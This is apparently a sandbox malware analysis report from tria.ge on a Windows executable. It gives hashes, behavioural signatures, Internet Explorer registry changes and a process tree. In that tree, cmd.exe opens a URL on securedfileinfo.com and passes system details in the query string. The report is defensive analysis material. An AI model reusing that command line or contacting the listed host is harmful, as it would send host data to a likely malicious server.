Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
133s -
max time network
140s -
platform
windows7_x64 -
resource
win7-20220812-en -
resource tags
arch:x64arch:x86image:win7-20220812-enlocale:en-usos:windows7-x64system -
submitted
27/11/2022, 15:45
Static task
static1
Behavioral task
behavioral1
Sample
de2f686de0313bbcd1778f1ac88d8f93a07a68546b8c390edf42b5b2102f060c.exe
Resource
win7-20220812-en
Behavioral task
behavioral2
Sample
de2f686de0313bbcd1778f1ac88d8f93a07a68546b8c390edf42b5b2102f060c.exe
Resource
win10v2004-20220812-en
General
-
Target
de2f686de0313bbcd1778f1ac88d8f93a07a68546b8c390edf42b5b2102f060c.exe
-
Size
143KB
-
MD5
abb8f2971f4b71720b7033c4ca4ec792
-
SHA1
de5b6bb19420c35e54cc578f3ecb36933a721bef
-
SHA256
de2f686de0313bbcd1778f1ac88d8f93a07a68546b8c390edf42b5b2102f060c
-
SHA512
80760c28aff9f130e59374313fa524f66a20a853bd4505b01f1e483f663053a7ba0467cc4a934b6af7590afb244ada4e96789cbf17d70f913f20c03b2cb3031b
-
SSDEEP
3072:iN6ZekwVJIlgps5q9Eb648qwlS/+TfQO45Dw7:pe9IB83ID5U7
Malware Config
Signatures
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
description ioc Process Set value (int) \REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{330071C1-6F2D-11ED-B2BF-6651945CA213} = "0" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "376412519" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Internet Explorer\GPU iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Internet Explorer\InternetRegistry iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Internet Explorer\Main iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Internet Explorer\PageSetup iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Internet Explorer\Main IEXPLORE.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Internet Explorer\DomainSuggestion iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1" iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\en-US = "en-US.1" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Internet Explorer\Zoom iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Internet Explorer\IntelliForms iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Internet Explorer\Toolbar iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 20d9920b3a03d901 iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Internet Explorer\IETld\LowMic iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Internet Explorer\LowRegistry iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb010000004cb1089434c01e4c935a9168a9753baf000000000200000000001066000000010000200000003715fe9ed41ad83b3cff87e892fe806cb99f3c781aef2bd1a1c0a7e5d5c40af1000000000e80000000020000200000009370ac2b2c84e2ba104689d7263d5265908d626d27720d6013b83f06772e442d20000000bbd72e99abbecb1aeaec1962fca60ca95f1b70436c8b62f157604f253963b1db40000000ea0b466a3b81482dd3a9784243b525c8d2af1bc549ef3dbc9c19fa7f1988a8aee1e87d151f918d732f46e1727b30e0c08bd8d1a8eb8f67d6c3a5fcfa3237d50a iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb010000004cb1089434c01e4c935a9168a9753baf000000000200000000001066000000010000200000003099f01e365fb0bdd5b6c9a47dc4435fce8e87ab36428b2c7f99d124c411e08a000000000e8000000002000020000000791cc2a47a4775d5b12ab817aa41544e395912ac1172cc7ce216e3570dc1205c9000000043271c0d0678e4b8e799a203eedb7b978feba37613590577f2d289e993c7412df150bc79be86bf77b101453223f09d1e9ef52af63f53f3d0b8785aa1d0dc9f930b79ef0b310ea02a34b450d535f591eacf2c8c9d788ced60be0c8330a2dbbfe93045b4d1a29652e57b2c0b4b9c42119c03fca26032f7ab2883cf283cb7cbc8f2f21d462bffa4e88b2fefb9f30c94fc0d40000000416cc176a19192b80cb3168538fafe12973285b7f6599242c8984e25b4b3f4170875aa0ae0d48d4ae4c1dbb7f3537ede8f01e51b58a53ac7423a985a37891385 iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\ iexplore.exe -
Suspicious use of FindShellTrayWindow 2 IoCs
pid Process 1944 de2f686de0313bbcd1778f1ac88d8f93a07a68546b8c390edf42b5b2102f060c.exe 1904 iexplore.exe -
Suspicious use of SendNotifyMessage 1 IoCs
pid Process 1944 de2f686de0313bbcd1778f1ac88d8f93a07a68546b8c390edf42b5b2102f060c.exe -
Suspicious use of SetWindowsHookEx 6 IoCs
pid Process 1904 iexplore.exe 1904 iexplore.exe 580 IEXPLORE.EXE 580 IEXPLORE.EXE 580 IEXPLORE.EXE 580 IEXPLORE.EXE -
Suspicious use of WriteProcessMemory 12 IoCs
description pid Process procid_target PID 1944 wrote to memory of 1800 1944 de2f686de0313bbcd1778f1ac88d8f93a07a68546b8c390edf42b5b2102f060c.exe 30 PID 1944 wrote to memory of 1800 1944 de2f686de0313bbcd1778f1ac88d8f93a07a68546b8c390edf42b5b2102f060c.exe 30 PID 1944 wrote to memory of 1800 1944 de2f686de0313bbcd1778f1ac88d8f93a07a68546b8c390edf42b5b2102f060c.exe 30 PID 1944 wrote to memory of 1800 1944 de2f686de0313bbcd1778f1ac88d8f93a07a68546b8c390edf42b5b2102f060c.exe 30 PID 1800 wrote to memory of 1904 1800 cmd.exe 32 PID 1800 wrote to memory of 1904 1800 cmd.exe 32 PID 1800 wrote to memory of 1904 1800 cmd.exe 32 PID 1800 wrote to memory of 1904 1800 cmd.exe 32 PID 1904 wrote to memory of 580 1904 iexplore.exe 33 PID 1904 wrote to memory of 580 1904 iexplore.exe 33 PID 1904 wrote to memory of 580 1904 iexplore.exe 33 PID 1904 wrote to memory of 580 1904 iexplore.exe 33
Processes
-
C:\Users\Admin\AppData\Local\Temp\de2f686de0313bbcd1778f1ac88d8f93a07a68546b8c390edf42b5b2102f060c.exe"C:\Users\Admin\AppData\Local\Temp\de2f686de0313bbcd1778f1ac88d8f93a07a68546b8c390edf42b5b2102f060c.exe"1⤵
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:1944 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c "start http://securedfileinfo.com/404.jsp?chid=5301121^&rsn=plde^&details=^|v6.1.7601x64sp1.0ws^|tt36^|dt0^|dc100^|fs-2^|dh0^|ec13^|se12007^|dr4^|ds0^|rs0^|p1"2⤵
- Suspicious use of WriteProcessMemory
PID:1800 -
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" http://securedfileinfo.com/404.jsp?chid=5301121&rsn=plde&details=|v6.1.7601x64sp1.0ws|tt36|dt0|dc100|fs-2|dh0|ec13|se12007|dr4|ds0|rs0|p13⤵
- Modifies Internet Explorer settings
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1904 -
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1904 CREDAT:275457 /prefetch:24⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
PID:580
-
-
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA
Filesize1KB
MD57ef66f502cb164d6d88fd779895d5e07
SHA175c68e887afe0041c18bc01dc36ae719db07a436
SHA256084f8949af79ac48c5c245e4bbeea807949d1e8e182e7d0487227231fcd97a77
SHA512419b6e5def7e1051af856ea4256235fa4f1bdbf001b54f1db9e59c44f7da8f9cfa8d63f77e35345ec6d5c3ab13de10094281d44f42a7e1fd9d92b3b68ac5ba9e
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\265C0DEB29181DD1891051371C5F863A_46F574BDF8F8E3AC29733131E4667BA4
Filesize472B
MD503ad9fc0b00b5df3165dc2fb1e3b0a3e
SHA1f8243335a8bc24d989bddd346048a055e1d0bdeb
SHA256366b28d491f7fd632e31c1ce97f939555f7dcee14bb6875737ed2d3e96fa32ec
SHA512a3cd8a001366e6c1b96d2b920d56e6efd34e9b69b9805e1a2b0c270346712e22420366f8bd18bbb1dd16fa60d481ad65b13385a66a3f1fa0d7aadaaa27b99796
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA
Filesize724B
MD5f569e1d183b84e8078dc456192127536
SHA130c537463eed902925300dd07a87d820a713753f
SHA256287bc80237497eb8681dbf136a56cc3870dd5bd12d48051525a280ae62aab413
SHA51249553b65a8e3fc0bf98c1bc02bae5b22188618d8edf8e88e4e25932105796956ae8301c63c487e0afe368ea39a4a2af07935a808f5fb53287ef9287bc73e1012
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA
Filesize410B
MD56b50d84037caf7791778564ad8509056
SHA166fc9eeff7ed2447b6710d9cfd745b558291d661
SHA2562f121db143f95b43e6e76739c4a58c25e2aa8d0c82ae45e30705cea39c5326e8
SHA512966854f1609457ef7d27088a21e42276fba5578d68860d112527f7c13a3a0befaa881794a2a9f6ca752e3326e90f56f9eb7689adddef19bd9c6417883c9cbeab
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\265C0DEB29181DD1891051371C5F863A_46F574BDF8F8E3AC29733131E4667BA4
Filesize402B
MD594acabc09f6a5fcc7a328c58338fbbc5
SHA14e67fe81f7caa9ede50b5c8e9d5ad79aacc15956
SHA256ebf694a80fee06b00272806b19cab63d84afb8e70d97d3c91f25af75f0cb00e2
SHA5125e47f829bf840ace15638a0b4ea85499e9df94264b3a50f83094013d74cdde64d844751ce38b9dc5d1314217877defe7d5594561f93f265506f400b471cc93a9
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize340B
MD5847727cd11e295209e2c32e0d4f6b008
SHA18dfb3812f5c3280e50866323623fc3600668bf2c
SHA256a0f26553289a581ea7f12ae9bafd587e4be6aa1271897b4b665b18e6ab095848
SHA512a1e7ce40fd0dbba1a128fe04bab8520f4e2c30f3729671b8d44b8a5ce949129b2fed7019bd5cfb51e9fea0f53d26b2bafb79644e476f960bb42ba24c7ef0c6fb
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA
Filesize392B
MD53d4883a671f4a65e823ec2ad780d9baf
SHA1e4de6f7cb008727843fcb021f07cbf42a368b383
SHA256eb0435058e40463bb07a60629b611d2f094b31ddd916e911937b3b2139443e41
SHA512c6a9dc2b7cd96015e178e2a49f25dd59930158a97750b2d065b0ed1d3da03e32b2960186e9bf95d5e25145086c920b637415cdd18dd3faef9050b6cadadfed58
-
Filesize
603B
MD53ff97e9bdefa99c4a7da64c47c9721b3
SHA1eebe49cb128f67019c47b8cc4477738616856703
SHA2564416436c5ca86ff74d264463b130c492d2b1c5eaf175a7445da063d7425ab8ff
SHA512d7e98830e79c31a260732963bf832f247540fba27c48f04ce1c1d00c6aa89069795bd4ab907b3900b075c289761914bac9daa2432f828c50623715a279189dab